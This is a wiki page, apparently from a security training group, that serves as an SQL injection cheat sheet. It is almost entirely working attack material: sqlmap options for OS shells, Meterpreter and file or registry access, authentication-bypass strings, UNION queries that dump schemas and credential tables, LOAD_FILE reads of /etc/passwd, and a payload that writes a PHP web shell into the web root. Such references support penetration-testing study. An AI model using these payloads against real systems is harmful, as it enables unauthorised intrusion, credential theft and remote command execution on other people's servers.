Sql Injection

From RCATs
Revision as of 18:23, 20 January 2023 by SourMilk (talk | contribs)
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

SQLMAP

SqlMap Wiki 

#from file
-r 
# Try to pop a shell
--os-shell
# Injecting a Meterpreter shell or VNC
--os-pwn
# Run operating system level commands
--os-cmd=OSCMD  
# One click prompt for an OOB shell, meterpreter or VNC
--os-smbrelay 
# Stored procedure buffer overflow exploitation
--os-bof 
#Database process’ user privilege escalation
--priv-esc  
# Local path where Metasploit Framework 3 is installed
--msf-path=MSFPATH  

#File reading and Writing
# Read a file from the back-end DBMS file system
--file-read=RFILE   
#Write a local file on the back-end DBMS file system
--file-write=WFILE 
#Back-end DBMS absolute filepath to write to
--file-dest=DFILE   

# Windows Registry Access: These options can be used to access the back-end database management system’s Windows registry.
# Read a Windows registry key value
-–reg-read 
# Write a Windows registry key value data
–-reg-add   
# Delete a Windows registry key value
-–reg-del   
# Windows registry key
--reg-key=REGKEY 
# Windows registry key value
--reg-value=REGVAL 
# Windows registry key value data
--reg-data=REGDATA  
#Windows registry key value type
--reg-type=REGTYPE  


--technique=
    # Examples
    B: Boolean-based blind # AND 1=1
    E: Error-based # AND GTID_SUBSET(@@version,0)
    U: Union query-based # UNION ALL SELECT 1,@@version,3
    S: Stacked queries # ; DROP TABLE users
    T: Time-based blind # AND 1=IF(2>1,SLEEP(5),0)
    Q: Inline queries # SELECT (SELECT @@version) from

# Automatic parameter finding
--crawl

# Redirect traffic through burp to see all requests
--proxy
--proxy="socks4://177.39.187.70:33283"

# Provide Proxy file
--proxy-file

# Check/use Tor
--check-tor
--tor

# Banner Grab
--banner

# Current user Grab
-- current-user

# Grab Password Hashes
--passwords

# Checking if the current user has DBA (administrator) rights.
--is-dba

# Potential to read files
--file-read "/etc/passwd"

# File write (shell.php) to /var/www/
--file-write "shell.php" --file-dest "/var/www/html/shell.php"

# Complete overview of the database architecture
--schema

# Search in Complicated databases
Example for searching for a user table name
--search -T user
Example for searching for pass in a column
--search -C pass

# Tamper Scripts (Example)
--tamper=between,randomcase
--list-tampers

Basic SQL Commands

Login 

mysql -u root -h <IP/HOST> -P <PORT> -p

SQLi Discovery

Auth Bypass Payloads 

Payload     URL Encoded
'             %27
"             %22
#             %23
;             %3B
)             %29

Example SQLi Discovery 

admin' OR '1'='1

SELECT * FROM logins WHERE username='admin' or '1'='1' AND password = 'something';
    If username is admin
    OR
    If 1=1 return true 'which always returns true'
    AND
    If password is something

Comment Types 

--
#    Sometimes needs to be url encoded '%23'
/**/  in line comment

Auth Bypass with comments 

admin'--

SELECT * FROM logins WHERE username='admin'-- ' AND password = 'something';

sometimes parenthesis will be used. This will grab the 5th id on the database, then comment out last portion
' or id = 5 )#

SELECT * FROM logins WHERE (username='' or id = 5)#' AND id > 1) AND password = 'd41d8cd98f00b204e9800998ecf8427e';

Union Injections

Continue until you receive en error if you fail at 5, your table has 4 columns. 

' order by 1-- -
' order by 2-- -
' order by 3-- -
' order by 4-- -

# Recieves Error
' order by 5-- -

Using the above example this will get an error since we have 4 columns. 

#Bad
aa' UNION select 1,2,3-- -

#Fix
aa' UNION select 1,2,3,4-- -

Gets version 

aa' UNION select 1,@@version,3,4-- -

Database Enumeration

Payload             When to Use                         Expected Output                                     Wrong Output
SELECT @@version    When we have full query output      MySQL Version 'i.e. 10.3.22-MariaDB-1ubuntu1'       In MSSQL it returns MSSQL version. Error with other DBMS.
SELECT POW(1,1)     When we only have numeric output    1                                                   Error with other DBMS
SELECT SLEEP(5)     Blind/No Output                     Delays page response for 5 seconds and returns 0.   Will not delay response with other D

List Databases 

# local database
SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA;

# Injection
aa' UNION select 1,schema_name,3,4 from INFORMATION_SCHEMA.SCHEMATA-- -

What database is currently in use 

aa' UNION select 1,database(),3,4-- -

# user() another command to see user.

Replaced 2 and 3 to pull from the database 'dev' 

aa' UNION select 1,TABLE_NAME,TABLE_SCHEMA,4 from INFORMATION_SCHEMA.TABLES where table_schema='dev'-- -

Dumping 'credentials' column names 

aa' UNION select 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='credentials'-- -

Now that we have column names we dump usernames and passwords 

aa' UNION select 1, username, password, 4 from dev.credentials-- -

Reading Files

db user 

#Find current user
SELECT USER()
SELECT CURRENT_USER()
SELECT user from mysql.user

aa' UNION SELECT 1, user(), 3, 4-- -
#or
aa' UNION SELECT 1, user, 3, 4 from mysql.user-- -

Check User privileges 

SELECT super_priv FROM mysql.user

aa' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user-- -
aa' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user WHERE user="root"-- -

#Dump other privs
aa' UNION SELECT 1, grantee, privilege_type, 4 FROM information_schema.user_privileges-- -
aa' UNION SELECT 1, grantee, privilege_type, 4 FROM information_schema.user_privileges WHERE user="root"-- -

Load File 

SELECT LOAD_FILE('/etc/passwd');

aa' UNION SELECT 1, LOAD_FILE("/etc/passwd"), 3, 4-- -

#View a page syntaxhighlight (Ctrl+U)
aa' UNION SELECT 1, LOAD_FILE("/var/www/html/search.php"), 3, 4-- -

Writing Files

The secure_file_priv variable is used to determine where to read/write files from. Empty = entire file system 

SHOW VARIABLES LIKE 'secure_file_priv';

#Above command in select form
SELECT variable_name, variable_value FROM information_schema.global_variables where variable_name="secure_file_priv"

#Union injection command
aa' UNION SELECT 1, variable_name, variable_value, 4 FROM information_schema.global_variables where variable_name="secure_file_priv"-- -

Writing data 

#Copy all data from users into /tmp/creds
SELECT * from users INTO OUTFILE '/tmp/credentials';

#writing into /tmp/test.txt
SELECT 'this is a test' INTO OUTFILE '/tmp/test.txt';

#Writing into /www/html/
select 'file written successfully!' into outfile '/var/www/html/proof.txt'
aa' union select 1,'file written successfully!',3,4 into outfile '/var/www/html/proof.txt'-- -

Writing a Web Shell 

<?php system($_REQUEST[0]); ?>

#Visit /shell.php then input command. Example (/shell.php?0=id)
aa' union select "",'<?php system($_REQUEST[0]); ?>', "", "" into outfile '/var/www/html/shell.php'-- -

#or
aa' union select "",'<?php system("whoami"); ?>', "", "" into outfile '/var/www/html/shell.php'-- -
Retrieved from "https://rcats.dev/rcats/index.php?title=Sql_Injection&oldid=71"